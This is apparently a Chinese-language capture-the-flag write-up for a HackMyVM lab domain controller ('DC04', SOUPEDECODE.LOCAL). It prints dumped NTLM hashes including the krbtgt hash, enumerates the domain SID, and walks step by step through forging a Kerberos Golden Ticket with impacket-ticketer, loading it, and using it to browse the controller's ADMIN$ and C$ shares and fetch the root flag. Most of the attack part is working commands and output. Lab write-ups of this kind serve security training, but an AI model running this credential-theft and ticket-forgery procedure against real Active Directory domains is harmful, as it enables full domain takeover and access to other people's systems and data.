SMB 192.168.56.126 445 DC01 soupedecode.local\otom75:1178:aad3b435b51404eeaad3b435b51404ee:2c16a2918e02eebb7fb3bac6be1d157a:::
SMB 192.168.56.126 445 DC01 soupedecode.local\hyusuf76:1179:aad3b435b51404eeaad3b435b51404ee:c6014e8ec0b66cb67bb07e08da725c06:::
SMB 192.168.56.126 445 DC01 soupedecode.local\xyara77:1180:aad3b435b51404eeaad3b435b51404ee:84a8b0d70714d5e9be2bd8d020c4562c:::
SMB 192.168.56.126 445 DC01 soupedecode.local\aian78:1181:aad3b435b51404eeaad3b435b51404ee:a29ea7347e2037278c08073de4334e90:::
SMB 192.168.56.126 445 DC01 soupedecode.local\xkate578:1182:aad3b435b51404eeaad3b435b51404ee:96ea865cda874db10d1b7c333e0d014a:::
SMB 192.168.56.126 445 DC01 soupedecode.local\ctina80:1183:aad3b435b51404eeaad3b435b51404ee:a2e4a0ae3dd15b118c8a210be20365e0:::
SMB 192.168.56.126 445 DC01 soupedecode.local\xrose81:1184:aad3b435b51404eeaad3b435b51404ee:ce4353626ad1fe9f76b1f5a1681d51aa:::
SMB 192.168.56.126 445 DC01 soupedecode.local\xharper82:1185:aad3b435b51404eeaad3b435b51404ee:008cd6d501431735075d448ff9c42704:::

得到服务账号krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0f55cdc40bd8f5814587f7e6b2f85e6f:::

krbtgt验证

验证一下这个hash的有效性,看来hash是对的。

Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# netexec ldap 172.16.52.181 -u krbtgt -H 0f55cdc40bd8f5814587f7e6b2f85e6f
[*] Initializing LDAP protocol database
LDAP 172.16.52.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL)
LDAP 172.16.52.181 389 DC01 [-] SOUPEDECODE.LOCAL\krbtgt:0f55cdc40bd8f5814587f7e6b2f85e6f STATUS_ACCOUNT_DISABLED

如果hash是错的后面不会出现STATUS_ACCOUNT_DISABLED

DOMAIN SID

Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# impacket-lookupsid $DOMAIN/rtina979:heathcliff@172.16.52.181
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 172.16.52.181
[*] StringBinding ncacn_np:172.16.52.181[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
513: SOUPEDECODE\Domain Users (SidTypeGroup)
514: SOUPEDECODE\Domain Guests (SidTypeGroup)
515: SOUPEDECODE\Domain Computers (SidTypeGroup)
516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
518: SOUPEDECODE\Schema Admins (SidTypeGroup)
519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)
520: SOUPEDECODE\Group Policy Creator Owners (SidTypeGroup)
521: SOUPEDECODE\Read-only Domain Controllers (SidTypeGroup)
522: SOUPEDECODE\Cloneable Domain Controllers (SidTypeGroup)
525: SOUPEDECODE\Protected Users (SidTypeGroup)
526: SOUPEDECODE\Key Admins (SidTypeGroup)
527: SOUPEDECODE\Enterprise Key Admins (SidTypeGroup)
553: SOUPEDECODE\RAS and IAS Servers (SidTypeAlias)
571: SOUPEDECODE\Allowed RODC Password Replication Group (SidTypeAlias)
572: SOUPEDECODE\Denied RODC Password Replication Group (SidTypeAlias)
1000: SOUPEDECODE\DC01$ (SidTypeUser)
1101: SOUPEDECODE\DnsAdmins (SidTypeAlias)
Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# rpcclient -U "rtina979" -c "lookupnames administrator" 172.16.52.181
Password for [WORKGROUP\rtina979]:
administrator S-1-5-21-2986980474-46765180-2505414164-500 (User: 1)

制作黄金票据

🟦 0. 已知条件(前提)

黄金票据必须满足 3 个条件:

需求说明
① 域 SID如:S-1-5-21-2986980474-46765180-2505414164
② krbtgt 账户的 NTLM hash例如:0f55cdc40bd8f5814587f7e6b2f85e6f
③ 域名如:SOUPEDECODE.LOCAL

🟦 1. 使用 ticketer 生成 Golden Ticket

impacket-ticketer \
-domain SOUPEDECODE.LOCAL \
-domain-sid S-1-5-21-2986980474-46765180-2505414164 \
-nthash 0f55cdc40bd8f5814587f7e6b2f85e6f \
eviluser

成功则输出:

[*] Saving ticket in eviluser.ccache

👉 说明你已经伪造 TGT,拥有域管级别权限。


🟦 2. 加载伪造的 Kerberos 票据

export KRB5CCNAME=eviluser.ccache

验证:

klist

会显示:

Default principal: eviluser@SOUPEDECODE.LOCAL

🟦 3. 配置 /etc/hosts与同步时间

Kerberos 不认 IP,只认主机名。

加入:

172.16.52.181 DC01.SOUPDECODE.LOCAL DC01

验证解析:

ping DC01
ping DC01.SOUPDECODE.LOCAL
Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# ntpdate 172.16.52.181

🟦 4. 使用 Kerberos 身份连接 SMB(不能用 IP)

正确方式:

impacket-smbclient -k -no-pass DC01

成功出现:

Type help for list of commands
#

说明 Golden Ticket 已生效。


🟦 5. 查看共享

shares

通常会看到:

  • ADMIN$
  • C$
  • SYSVOL
  • NETLOGON

🟦 6. 访问域控 ADMIN$(即 C:\Windows)

use ADMIN$
ls

看到系统目录即表示:
🎉 你已经以域管理员权限访问域控文件系统


🟦 7. 获取FLAG

进入 C 盘:

Terminal window
use C$
ls
# cd Administrator
# cd Desktop
drw-rw-rw- 0 Thu Nov 7 14:08:30 2024 .
drw-rw-rw- 0 Sat Jun 15 15:56:40 2024 ..
-rw-rw-rw- 282 Sat Jun 15 13:54:32 2024 desktop.ini
-rw-rw-rw- 32 Thu Nov 7 05:08:10 2024 root.txt
# get root.txt
Terminal window
┌──(root㉿kali)-[/home/kali/Desktop/hmv/DC04]
└─# cat root.txt
1c66eabe105636d7e0b82ec1fa87cb7a



Thanks for reading!